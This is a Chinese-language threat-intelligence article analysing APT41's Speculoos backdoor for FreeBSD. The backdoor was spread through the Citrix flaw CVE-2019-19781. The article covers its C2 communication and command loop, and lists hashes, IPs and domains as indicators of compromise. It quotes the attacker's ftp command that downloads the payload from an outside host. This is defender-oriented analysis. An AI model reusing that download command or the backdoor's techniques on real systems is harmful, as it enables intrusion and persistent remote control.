专栏首页FreeBufAPT41 Speculoos后门分析

APT41 Speculoos后门分析

2020年3月25日,FireEye发表了APT41全球攻击活动报告。此攻击活动发生在1月20日至3月11日期间,主要对Citrix,Cisco和Zoho网络设备进行攻击。研究人员根据WildFire和AutoFocus数据获得了针对Citrix设备的攻击样本‘Speculoos’,还确定了北美,南美和欧洲等世界各地多个行业的受害者。

Speculoos的基于FreeBSD实现的,共识别出五个样本,所有样本文件大小基本相同,样本集之间存在微小差异。Speculoos利用CVE-2019-19781进行攻击传播,CVE-2019-19781影响Citrix Application Delivery Controller,Citrix Gateway和Citrix SD-WAN WANOP等设备,允许攻击者远程执行任意命令。

攻击细节

攻击者利用CVE-2019-19781远程执行命令:’/usr/bin/ftp -o /tmp/bsd ftp://test:[redacted]\@ 66.42.98[.]220/‘。

第一波攻击始于2020年1月31日晚上,使用的文件名为bsd,影响了美国的多个高等教育机构,美国医疗机构和爱尔兰咨询公司。第二波攻击始于2020年2月24日,使用文件名为un,影响了哥伦比亚高等教育机构,奥地利制造组织,美国高等教育机构以及美国的州政府。

基于BSD系统的恶意软件相对少见,此工具和特定Citrix网络设备有关,因此Speculoos很可能是APT41组织专为此攻击活动研发的。

二进制分析

Speculoos后门是使用GCC 4.2.1编译的ELF可执行文件,可在FreeBSD系统上运行。该负载无法保持持对目标持久控制,因此攻击者会使用额外的组件或其他攻击手段维持控制。后门执行后将进入循环,该循环调用函数通过443端口与C2域进行通信:

alibaba.zzux[.]com (119.28.139[.]120)

如果无法通信,Speculoos会尝试通过443端口与119.28.139[.]20上的备份C2通信。如果连接到任一C2服务器,它将与服务器进行TLS握手。图1显示了发送到C2服务器的数据包。

它请求login.live [.] com作为Server Name Indication(SNI)。

成功连接到C2并完成TLS握手后,Speculoos将对目标系统进行指纹识别,并将数据发送回C2服务器。其结构如下表1所示。

数据通过TLS通道发送,并且Speculoos会等待服务器的两字节响应。收到响应后,它将向C2发送一个字节(0xa),并进入循环等待命令。表2为攻击者可执行命令, 可让攻击者完全控制受害者系统。

研究中分析的两个Speculoos样本在功能上相同,两者之间只有八个字节不同,在收集系统信息时‘hostname‘和‘uname -s’命令不同导致。uname -s返回内核信息,hostname返回主机系统名称。下图显示了两个Speculoos样本之间的二进制比较。

影响评估

互联网可访问设备允许未经授权的用户远程执行代会带来很大的安全问题,CVE-2019-19781影响了多个面向互联网的设备,攻击者积极利用此漏洞来安装自定义后门。受影响组织大量的网络活动都必须经过这些网络设备,攻击者可以监视或修改整个组织的网络活动。

默认情况下通过这些设备可以直接访问组织系统内部,攻击者无需考虑内部网络横向移动的问题。攻击者可以修改网络流量,注入恶意代码,执行中间人攻击,或将用户重定向到虚假登录页面来收集登录凭证。

IOCs

Speculoos SHA256

99c5dbeb545af3ef1f0f9643449015988c4e02bf8a7164b5d6c86f67e6dc2d28 6943fbb194317d344ca9911b7abb11b684d3dca4c29adcbcff39291822902167 493574e9b1cc618b1a967ba9dabec474bb239777a3d81c11e49e7bb9c71c0c4e 85297097f6dbe8a52974a43016425d4adaa61f3bdb5fcdd186bfda2255d56b3d c2a88cc3418b488d212b36172b089b0d329fa6e4a094583b757fdd3c5398efe1

Network

119.28.139[.]20 alibaba.zzux[.]com 119.28.139[.]120 66.42.98[.]220 exchange.longmusic[.]com

*参考来源:unit42,由Kriston编译,转载请注明来自FreeBuf.COM

本文分享自微信公众号 - FreeBuf(freebuf),作者:Kriston

原文出处及转载信息见文内详细说明,如有侵权,请联系 yunjia_community@tencent.com 删除。

原始发表时间:2020-05-16

本文参与腾讯云自媒体分享计划,欢迎正在阅读的你也加入,一起分享。

我来说两句

0 条评论
登录 后参与评论

相关文章

  • BlackHat 2018 | 关注三个热点领域:加密数字货币、医疗设备和机器学习

    Black Hat USA已经走过了20个年头,作为世界领先的信息安全峰会,它为与会者提供了大量的第一手安全研究、开发和趋势资讯。今年的Black Hat US...

    FB客服
  • IBM报告称全球活跃黑客攻击数量下降,安全团队需关注更紧迫的威胁

    IBM近日发布一份针对活跃黑客攻击的报告,报告显示,自2015年以来,造成可量化损害的黑客行为攻击数量下降了95%。

    FB客服
  • 网络攻击瞄准个人银行,谈谈5个典型攻击手段

    在当今的数字时代,银行和金融服务公司为了提高竞争力,往往为客户提供了在线管理资金的便捷功能。但不幸的是,大多数银行平台都缺失安全设计,这导致黑客一直在利用这些潜...

    FB客服
  • AngularDart4.0 英雄之旅-教程-07路由 顶

    如果该应用程序尚未运行,请启动该应用程序。 在进行更改时,请通过重新加载浏览器窗口来保持运行。

    南郭先生
  • df 和 ls 命令执行夯主

    其实他说第二点问题的时候我就已经猜到问题所在了,那不就是远程挂载的磁盘非正常的掉了,然后就会造成这个问题。但是他说 ISCSI 这个玩意的时候我不知道是啥,于是...

    张琳兮
  • Linux 命令(137)—— strace 命令

    strace 命令是一个集诊断、调试、统计于一体的工具,我们可以使用 strace 对程序的系统调用和信号传递的跟踪结果来对程序进行分析,以达到解决问题或者是了...

    Dabelv
  • 银行金融系统时钟同步系统方案设计

    在当代科技的快速发展下,各行各业对于时间精度的要求也越来越高,普通的时钟设备已经无法满足各行各业的需求,比如银行金融系统的时钟设备,则需要时钟能够以卫星时间为基...

    时频专家
  • 教程 | Caffe在Windows10系统上安装与配置

    直接运行build_win.cmd文件即可,在执行之前可以先检查一下python的版本,Caffe-windows只支持python2.7与python3.5两...

    OpenCV学堂
  • 人类又双叒输了!Open AI完虐Dota顶级职业玩家,推塔如割草!

    【新智元导读】OpenAI今天凌晨与DOTA2职业玩家队伍对战,并且以2:1的成绩战胜了人类玩家,这是AI历史上一个值得纪念的里程碑,意义或许比AlphaGo战...

    新智元
  • rsGen:一款基于Windows BAT和JS混编实现的通用反弹shell命令生成器

    rsGen是一款基于Widows BAT&JS混编实现的多功能反弹shell命令生成器。不仅支持生成原生反弹shell命令,还支持生成“命令中转”形式的一句话反...

    FB客服

扫码关注云+社区

领取腾讯云代金券